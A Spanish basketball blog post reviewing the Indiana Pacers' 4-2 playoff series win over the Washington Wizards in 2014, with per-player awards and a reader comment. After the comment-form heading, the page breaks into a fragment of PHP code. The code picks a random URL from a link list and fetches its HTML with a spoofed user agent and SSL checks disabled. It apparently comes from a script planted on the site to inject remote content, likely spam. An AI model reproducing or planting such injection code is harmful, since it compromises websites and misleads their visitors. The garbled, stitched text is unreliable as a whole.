PO 2014: Resumen Pacers 4 – Wizards 2

17 de May de 2014 por Esteban

Y finalmente los Pacers llegan a la final de la conferencia Este, un punto y final (presumiblemente) digno para una temporada que durante unas semanas pareció condenada al fracaso más absoluto. Atrás quedan la desventaja 3-2 frente a los Hawks, con partido a cara o cruz en Atlanta, y la contundente derrota en el primer partido de local frente a los Wizards, lo que presagiaba una serie totalmente diferente.

Ahora los de Vogel podrán jugar sin la presión del posible fracaso sobre sus cabezas, puesto que ser eliminados por los Heat en la final de conferencia,difiere muchísimo de ser eliminado por los Hawks en cuartos o por los Wizards en semis.

Pero vamos al análisis de la serie:

Finalmente hemos visto la mejor cara de los Pacers en meses, ganando 3 juegos de manera consecutiva (dos de ellos a domicilio) en los que dejaron a los Wizards en 82, 63, 92 puntos y dando la vuelta así a una serie que tras el primero parecía harto complicada. Hubiese sido todo un logro ganar el juego 5 y liquidar la serie 4-1 pero eso habría significado ganar 4 juegos de manera consecutiva, algo que no consiguen desde marzo, cuando se impusieron consecutivamente a Celtics, 76ers, Pistons y 76ers nuevamente. Comprobando el calibre de los rivales, los 3 fuera de PO, rápidamente se deduce que  el sendero del año 2014 de los Pacers no ha sido ni por asomo fácil y se ha visto cierta reacción en esta serie. 

A excepción del primer juego, donde los de la capital se fueron hasta los 102 puntos, hemos asistido al resurgimiento de la mejor defensa de la liga. A los tres partidos anteriormente mencionados, se le suma el sexto, en el que dejaron a sus rivales en 80 puntos. También han mantenido durante casi toda la serie a Wall en menos del 50% de acierto y a Beal en la misma sintonía.

Pero aun en el primer juego que los Wizards se robaron, se vio un atisbo de lo que iba a venir. Los Wizards habían dominado todo el partido y a falta de 5 minutos se imponían por 14 puntos de diferencia. En aquel preciso momento entraron en un terrible bache: ya no anotaron ninguna canasta más en juego, permitieron 4 triples de los Pacers en el último minuto, y solo un gran acierto desde la línea de tiros libres les permitió ganar el partido de forma ajustada. Aun jugando mucho mejor, el peso de la responsabilidad era demasiado para los Wizards.

La clave de la serie fue el resurgir no solo de la defensa sino de un tal Roy Hibbert, determinante en el segundo partido e importante en cada una de las victorias de Indiana. Su nueva actitud, sumada a la inspiración individual de alguno de sus jugadores en juegos concretos (George en el 3 y 4 y West y Stephenson en el 6), fue demasiado para un equipo algo corto de recursos como los Wizards.

Los Pacers han vuelto a parecerse a ese equipo del principio de año que se imponía a cualquier equipo en todas las parcelas del juego. Ante esa defensa, por más buenos que sean los Wizards, no puede haber historia. En óptimas condiciones, los Pacers simplemente son mejor equipo y tienen más experiencia que los capitalinos.

PREMIOS

MVP: Roy Hibbert. Si bien no lució en todos los juegos y tanto George como West firmaron algunos partidos mejores que el pivote, este demostró su valor a través de los resultados de su equipo. Cuando Hibbert jugó mal su equipo perdió, cuando reapareció los Pacers ganaron. Quizá no es el mejor jugador del equipo pero sin duda es el jugador más influyente, tanto cuando está mal como cuando está encendido.

Sorpresa: A veces hay jugadores subestimados en esta liga por tener la desgracia de no haber disputado unos playoffs en los que demostrar su valía. Tal es el caso de Marcin Gortat, quien no es considerado un centro de élite en la NBA. A partir de estos PO esta impresión ha de cambiar. Es cierto que jugó mal en las derrotas de su equipo pero fue el factor determinante en las victorias. 12 puntos y 15 rebotes en el juego 1 y 31 – 16 en el juego 5. Promediar casi un 20- 10 en PO no es cosa fácil y el polaco lo hizo.

Decepción: No podemos hablar de grandes decepciones. Los Wizards llegaron realmente lejos y deben estar contentos y los Pacers se van de esta serie mejor de lo que llegaron. Pero como muchos comentaristas han resaltado, John Wall ha decepcionado un poco. Solo una gran actuación en el quinto partido, que significó victoria para los suyos, lo salva de una serie que podría tildarse de mala. Muchos problemas para conducir ofensivas de cinco contra cinco, y poco acierto en el tiro exterior. A diferencia de su compadre Beal, esta serie baja su caché.

Un parrafito merece también la banca de los Pacers, que no ha cumplido las expectativas. El nivel mostrado por Watson, Scola, Turner y el no mostrado por casi no jugar de Copeland, ha dejado mucho que desear.

Esfuerzo en vano: Bradley Beal. No fue una serie brillante la suya pero considerando que es apenas su segundo año en la liga se ha de destacar. Promedios de 18.3 puntos por partido, 5.2 rebotes, y 4.8 asistencias. No llega a los números de las grandes figuras, pero en breve parece que lo conseguirá.

Comenta

Un comentario a esta entrada

  1. Oli dice:
    #1

    Bradley beal el mejor escolta de la nba el a?o que viene??

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>